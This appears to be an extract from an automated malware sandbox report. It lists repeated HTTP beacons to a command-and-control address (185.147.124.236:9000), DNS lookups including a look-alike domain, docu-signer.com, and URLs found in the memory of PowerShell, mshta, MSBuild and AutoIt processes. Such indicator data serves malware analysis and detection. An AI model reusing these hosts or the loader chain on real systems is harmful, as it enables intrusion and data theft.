Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: docu-signer.com
Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: www.irs.gov
Source: global traffic	DNS traffic detected: DNS query: nopaste.net
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AEP
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.147.124.236:9000t-
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 0000000D.00000002.2569003004.0000023B7F085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000010.00000002.2565392713.0000026A2107F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A20DBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docu-signer.com
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9E915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://e127382.dscna.akamaiedge.net
Source: svchost.exe, 0000000D.00000003.1340593196.0000023B7EEC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D202000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: powershell.exe, 0000000E.00000002.2516521240.000001CAACA54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1307064773.000001E400095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9C9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1F971000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000000.1632817858.0000000000C79000.00000002.00000001.01000000.0000000F.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1869894756.0000000000409000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000002.1946984033.0000000000409000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9E915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.irs.gov
Source: MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000009.00000002.1307064773.000001E400049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1307064773.000001E40005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9C9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1F971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.cX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.coX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A2107F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A20DBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/aX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/apX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/X
